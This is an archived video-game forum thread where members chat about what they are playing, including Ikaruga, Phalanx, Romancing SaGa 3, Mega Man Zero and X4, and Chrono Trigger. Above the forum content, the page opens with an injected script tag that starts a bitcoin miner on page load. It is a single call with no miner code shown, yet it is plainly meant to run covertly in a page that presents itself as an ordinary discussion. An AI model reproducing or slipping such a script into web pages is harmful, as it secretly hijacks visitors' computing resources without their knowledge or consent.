<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralmario fan games galaxy

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Re: What games are you playing?

Postby KobaBeach » 5 years ago

Leet wrote:why do people make such generically settinged rpgs over and over and over

there need to be more Space Funerals and OFFs and MOTHERs in the world
Play Maka Maka

Warning it's in Japanese and it's a kusoge
It's also an obvious beta (think Sonic 2006)

I think there's a complete, yet rather basic walkthrough on GameFAQs tho
twitter (spicy at times!) | avatar by kuma

who cares:

Saturn Moriya

Postby Saturn Moriya » 5 years ago

4 seconds.

I was 4 second away.

4 seconds and I would've 1cc'd Ikaruga on easy mode.

THIS ISN'T FUN ANYMORE

Your blood their blood serves the same!!

Ishntknew

Postby Ishntknew » 5 years ago

Beat Mega Man Zero and Mega Man Zero 2.

The first game is super flawed. I don't know what to think of it. The flaws are significant and detract enough from the experience that I'm not sure I'd feel comfortable calling it a good game. But the underlying game is good enough that I don't feel like calling it a bad game either. And it doesn't even really fall in the middle-- instead, it's a fundamentally good game with lots of dumb ideas that hinder enjoyment. I dunno.

Zero 2 was much better. It cut out a bunch of the annoying things from the first game and made it far more enjoyable. Not to mention, I appreciate that this game was structured way more like a Mega Man game. The ending was incredibly bizarre though. It's clear that they knew they were getting a sequel, and decided to use the ending to bridge to that rather than as a real resolution. I... have problems with that, but since I got it as part of a compilation title, it doesn't affect me personally.

Maybe I'll head onto 3 once I'm done with finals (which I need to get back to...)
I'm a lizard's nightmare

Backloggery:
daypular

Rockythechao
the figure of Kevka's bear was a sightseeing
First name: Michael
Pronouns: he/they

Postby Rockythechao » 5 years ago

The only Zero game I played was Z4, and that was after both ZX games. I was thinking of starting X1 soon-ish, but all this talk about RPGs with quirky settings reminded me I still have a ways to go with my Earthbound playthrough so I should probably finish that first.

Also, there's a Smash Bros event at our local Best Buy tomorrow and Saturday. I'll be hanging out with my younger cousin tomorrow and I don't know if I'll be able to convince his parents to let me take him... but that certainly won't stop me from trying! 8-)
A2XT Episode 2's vice admiral "The Project's Not Dead Yet" person and certified Absurdly-Oblivious Fool

Useful posts, discussions & resources for SMBX and A2XT

My art & audio thread
Audiomack (new music), SoundCloud (old music)

𝐀𝐍 𝐀𝐖𝐄𝐒𝐎𝐌𝐄 𝐏𝐑𝐀𝐘𝐄𝐑 𝐈𝐒
𝐂𝐎𝐍𝐅𝐋𝐈𝐂𝐓 𝐖𝐈𝐓𝐇 𝐔𝐒

- 𝐁𝐀𝐓𝐓𝐋𝐄𝐒𝐔𝐈𝐓 𝐌𝐎𝐑𝐒𝐄𝐋 -

𝐊𝐄𝐄𝐏 𝐘𝐎𝐔𝐑 𝐃𝐈𝐆𝐍𝐈𝐓𝐘

Doctor Shemp
Banned

Postby Doctor Shemp » 5 years ago

Attempting to play through Final Doom for the first time. TNT is ridiculous. I'm getting the feeling that every second enemy is a chaingunner. Every where I walk there's a hail of hitscan bullets chipping away at my health with nothing I can do. Plutonia is even more ridiculous in a different way: 2 arch-viles in the first fucking level of the game on Hard. Getting ambushed by 5 revenants that teleport in behind you at the same time in the first level of the game on Hard. Holy shit. Even on Easy it's no cakewalk. The jump from Doom 2 to Plutonia is probably about 1.5 to 2 times the jump from SMB to Lost Levels.

Euparkeria
Palaeontological Platformerer
Pronouns: he/him/his

Postby Euparkeria » 5 years ago

Why is Dr. Wily's Revenge Wily Stage 1 so unfair? It makes me reluctant to continue.
Cool banner by Neutron Star!

Bean

Postby Bean » 5 years ago

First one's very unrefined, so that leads to some unfair moments. I personally think the stage after that is worse, but good luck. It is a tough one to get through if you don't know what's coming.

I'm trying to find the strength here to start Chrono Trigger. I want to, but I'm also feeling kind of out of it tonight. Oy.

pholtos
Loves adorable things.

Postby pholtos » 5 years ago

Phalanx! Why so difficult? Anyway I've made it up to stage 5. The game has basically taught me to put my butt at the very left edge of the screen, else I get hit by things coming in from the tops and bottoms all of a sudden.
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:

The 500 char limit is evil. :P

Saturn Moriya

pholtos wrote:Phalanx! Why so difficult? Anyway I've made it up to stage 5. The game has basically taught me to put my butt at the very left edge of the screen, else I get hit by things coming in from the tops and bottoms all of a sudden.
I've been playing a bit of Phalanx to save myself from Ikaruga madness. It really doesn't seem like a very good game to me, but something about it is drawing me in. It feels like a poor man's version of Thunder Force. Long, drawn out, sometimes slow stages (I've only made it to stage 4), throwing the same things at you over and over, and alot of really stupid deaths that feel very unjustified. And the bosses are WAY unbalanced. They either die like they're nothing because you have your weapon powered up, or they take an eternity because you just died a bunch. The "if you die you're pretty much fucked" convention of classic shooters is something I can live with, but this game is kinda dumb.

And as with almost every SNES shooter, the slowdown pretty much breaks it. Really unsatisfying.

E: alright I have to admit stage 5 is pretty cool. Big ol' infiltrate the cores of the giant base. All the stages have something interesting about them. Too bad it's not very well made. At times, especially the stage 2 boss, the game reminds me of Hydorah, the most amazing non-bullet hell horizontal shooter I've ever played.

KobaBeach
obscure jrpg enthusiast

Yesterday, while watching talkhaus movie night with ~devotee of patchouli~ and her BFFs I forgot to save in RS3 and I accidentally game overed, so I lost two techs that I sparked: Dragon Hit (Mizuchi) and Double Dragon (Double Dragon Wave).

I managed to spark Dragon Hit again (and also Charge). Trying to get Double Dragon now.
agie777 wrote:
pholtos wrote:Phalanx! Why so difficult? Anyway I've made it up to stage 5. The game has basically taught me to put my butt at the very left edge of the screen, else I get hit by things coming in from the tops and bottoms all of a sudden.
Long, drawn out, sometimes slow stages (...) [bosses can] take an eternity because you just died a bunch.
This is why I never played past stage 2 on Phalanx

snoresville

EDIT: Got Double Dragon!!! And I beat the Devil Armor by spamming it while on the Hunter Lance formation (the character with the waza, in this case Sharl, was on the back so as to not get hit by the enemy's attacks).

who cares:

Saturn Moriya

Phalanx is so quorky though! It's like one of those middle school projects that really isn't put together very well, but it has heart.

That said, I don't like how at some point they figured out how to make enemies and projectiles move in chase patterns, and proceeded to put it in as much as they could.

Stage 6 takes a hint from Parodius with some weird billboards in otherwise standard asteroid space. The game keeps throwing things at you that can't be avoided unless you know about them at an exponentially growing rate. Then there's a boss with a swinging four-way shooting arm and I lost my remaining lives. I never want to continue because it's too long and boring to redo stuff in the same sitting, but I'm still gonna try to beat the game.

Tomorrow I will start trying Ikaruga in segments. Kinda feels like it's not legit, but just can't do it anymore. I can't keep focus all the way through, five stages in a row. My TV is tired from standing up straight.

Insert Double Dragon joke I'm too tired to make something up.

KobaBeach
obscure jrpg enthusiast

Sparked a few more techs, finished a few more quests (mostly Vanguard-related) and beat Forneus in RomaSaGa 3!

Woop~
agie777 wrote:Tomorrow I will start trying Ikaruga in segments. Kinda feels like it's not legit, but just can't do it anymore. I can't keep focus all the way through, five stages in a row. My TV is tired from standing up straight.
Good luck!

who cares:

Bean

I made it through Find Mii II in StreetPass Mii Plaza thanks to getting a couple of Nintendo employee Spotpasses this week. Glad you can rehire old Miis for this mode since it makes things go faster. Still not sure whether to eventually count this as a game beaten once I've gone through all the split paths or not, but who cares? It's a fun little time waster.

KobaBeach
obscure jrpg enthusiast

Just did the quest involving the Professor's runaway dragon car.
The battle against the Nitro Zweiger (the aforementioned dragon car) was pretty badass, if a bit easy. To the game's defense, I did power-level a bit.

Magical Tank Battle is one of my fave Squaresoft battle themes~

I also did the quest where you save the Fairy from the travelling circus and the Holy King's trials.

EDIT: Oh and the quest with Maximus, almost forgot about that. Yeah, I got all of the five weapons you get from beating him. Limited inventories are annoying, though (if you don't know that you can lose some if you don't have space, well...). And yes, Herman got rejuvenated into Black after beating Forneus (I kept him mostly in the 6th slot though, dohohoho~).

EDIT 2: And I also went out of my way to get the workshop workers (including Nora).

who cares:

Saturn Moriya

*ahem*

IT'S FUCKING DONE

I took breaks after stage 3 and right before the final boss. I had 3 lives entering the final boss, breached the 13m 1-up and still ended with 0 lives.

I will get into normal mode SOME DAY, but it will be LONG time from now.

Now it's time for Okami and Dragon Quest 3.

Rockythechao
the figure of Kevka's bear was a sightseeing
First name: Michael
Pronouns: he/they

Postby Rockythechao » 5 years ago

Ended up not going to the Smash Bros thing, spent the day playing Mario 3D World with my cousin instead. Fun was still had, but the gating was really annoying -- I was enough of a stubborn completionist that I didn't have to worry about the star limits on my file, but my cuz wasn't so we kept having to go back and scrounge up 10-20 of those things each time. Naturally the Captain Toad and mystery house levels were already done so we had to get them from the regular levels, 1-3 at a time.

They did the same thing with Galaxy 2, didn't they? Combining both the beat-level-to-unlock-level progression and the star gates. It doesn't work. Should've either handled the green stars the same way as the star medals in all the NSMB games or made them the primary goals of the levels like 64/Sunshine/Galaxy 1.
A2XT Episode 2's vice admiral "The Project's Not Dead Yet" person and certified Absurdly-Oblivious Fool

Useful posts, discussions & resources for SMBX and A2XT

My art & audio thread
Audiomack (new music), SoundCloud (old music)

𝐀𝐍 𝐀𝐖𝐄𝐒𝐎𝐌𝐄 𝐏𝐑𝐀𝐘𝐄𝐑 𝐈𝐒
𝐂𝐎𝐍𝐅𝐋𝐈𝐂𝐓 𝐖𝐈𝐓𝐇 𝐔𝐒

- 𝐁𝐀𝐓𝐓𝐋𝐄𝐒𝐔𝐈𝐓 𝐌𝐎𝐑𝐒𝐄𝐋 -

𝐊𝐄𝐄𝐏 𝐘𝐎𝐔𝐑 𝐃𝐈𝐆𝐍𝐈𝐓𝐘

KobaBeach
obscure jrpg enthusiast

Arakes is dead~♪

2 abyss gates and a few more quests to go~♫

who cares:

Sorel
In the shadows
First name: Alexander
Pronouns: he/him/his

Postby Sorel » 5 years ago

I'm getting back into osu! again.

BTW today I met DatLeon in osu!.

It was a nice coincidence to see a familiar face.

pholtos
Loves adorable things.

Postby pholtos » 5 years ago

So I just beat Phalanx... on easy... yep not playing that one again for a long while, it's dang hard. Course I might just be bad at horizontal scrolling shooters.

So I rolled Eets Munchies next... I have no idea what this game is about but hey! I'll roll with it.

Edit: Oh hey it's a neat puzzle game that reminds me a bit of the incredible machines.
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:

The 500 char limit is evil. :P

Saturn Moriya

Easy mode? How lame! Only Kids play on easy mode! *hides data on just having beaten Ikaruga on easy*

In all seriousness, Phalanx doesn't deserve much more. It's sillyness. Though I wonder how "funny mode" would play out.

Bean

There. I finally started Chrono Trigger, and I'm enjoying it.

KobaBeach
obscure jrpg enthusiast

OH MY GOD YOU GUYS

OH MY GOD

BATTLING BYUNEI WHILE RIDING GWAYNE

HOLY FUCKING SHIT IS THIS AWESOME

Really easy if your HP's high, though (just spam your best waza and Gwayne's Twin Spike and boom you win)

1 Abyss gate to go~♪

Aunas is down as well~♪
0 Abyss gates to go~♫

The jungle was a pain to traverse. Nice music though.
The Fairy Village was so cool! My favorite part is how everyone there, except for the fairy you saved in the circus quest, are just the biggest trolls ever. One of them even serves you drugged tea and dumps you in the jungle below afterwards.

Now all I have to do is save the young boy (or "Shonen" if you prefer to use untranslated Japanese for unknown reasons), go into the abyss (yes, it is related to that abyss), defeat the real Abyss Lords (the ones in the outside world were just clones) and defeat the Destroyer.

who cares:

YelseyKing
Anyone want a banana? :3
First name: Matt

Postby YelseyKing » 5 years ago

KobaBeach wrote:Now all I have to do is save the young boy (or "Shonen" if you prefer to use untranslated Japanese for unknown reasons), go into the abyss (yes, it is related to that abyss), defeat the real Abyss Lords (the ones in the outside world were just clones) and defeat the Destroyer.
I always did dislike that part. You're ready to go to the final dungeon, and suddenly you have to swap out one of your characters for that snotty little boy you kept running into all over the place. Who is *so* incredibly "important" that the dev team didn't even bother giving him a *name*, and who comes in as one would expect a raw recruit to, with crap stats, no skills, etc. Fortunately, you can just stick the little shit in your reserve slot and be done with *that*, at least.

... also, I still need to finish Megaman X4. I finished the Maverick stages a few days ago, and got all the items/upgrades, but haven't even attempted the final stages yet. I wish that series would've, at some point, dropped the whole "can't save during the final stages" nonsense. I find it hard to make time these days for the hour and a half single gaming session these days...

Update: I just made an attempt at the final stages in MMX4. As seems to be the series tradition, everything was fine until Sigma's final form, which was all kinds of bananas. Two targets, two lifebars, little damage dealt from your attacks, few opportunities to actually attack, and a whole lot of attacks to figure out how to deal with. Good times! At least the first two forms are simple... but there's no way to refill your sub-tanks between attempts, so... yeah. Fun. Burned through 8 lives, and didn't even come close to victory.
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

metasomnia?
spinny pyromaniac
First name: Meta

Postby metasomnia? » 5 years ago

Man, Chapter 7 is taking forever to beat. I think I've been through the equivalent of four dungeons or something.

I guess this kinda balances out Chapter 6 being three seconds long.

KobaBeach
obscure jrpg enthusiast

I'm fighting the Abyss lords to make the final boss less of a pain.

FUCK YOU FORNEUS.

FUCK YOU.

The lifesaver in this was a combination of Tatyana having a Life Cane (which has the "Shatter Staff" tech, it heals the entire party and destroys the weapon) and me giving her a spear and the Triple Thrust tech (Epees and spears share the same profeciency level, since she's been using epees the entire game...).
YelseyKing wrote:The SaGa series is concentrated hatred vacuum sealed into a cartridge/CD. :P
Next playthrough, I need to strategize better.
Or, in other words: put only the best characters in the game in my party and grind for magic like Shadow Servant and break the entire game.

I really should have grinded for Shadow Servant, maybe Quicktime and Reviver as well.

Maybe next time?

EDIT: ALL ABYSS LORDS ARE DOWN!!

FINAL BOSS TIME!!

(True Arakes and True Forneus are kinda cute~♥)
(Forneus can still go get run over by a train for all I care tho)

who cares:

Return to “the cartridgé”